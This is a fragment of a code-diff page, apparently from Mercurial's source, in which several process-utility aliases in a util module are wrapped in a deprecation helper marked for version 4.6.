3841 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3833 shellenviron = procutil.shellenviron
3842 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3834 system = procutil.system
3843 system = _deprecatedfunc(procutil.system, '4.6')
3835 gui = procutil.gui
3844 gui = _deprecatedfunc(procutil.gui, '4.6')
3836 hgcmd = procutil.hgcmd
3845 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3837 rundetached = procutil.rundetached
3846 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3838
3847
3839 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
3848 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
3840 binary = _deprecatedfunc(stringutil.binary, '4.6')
3849 binary = _deprecatedfunc(stringutil.binary, '4.6')
3841 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3850 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3842 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3851 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3843 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3852 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3844 email = _deprecatedfunc(stringutil.email, '4.6')
3853 email = _deprecatedfunc(stringutil.email, '4.6')
3845 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3854 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3846 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3855 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3847 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3856 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3848 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3857 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3849 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3858 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3850 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3859 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3851 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
3860 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now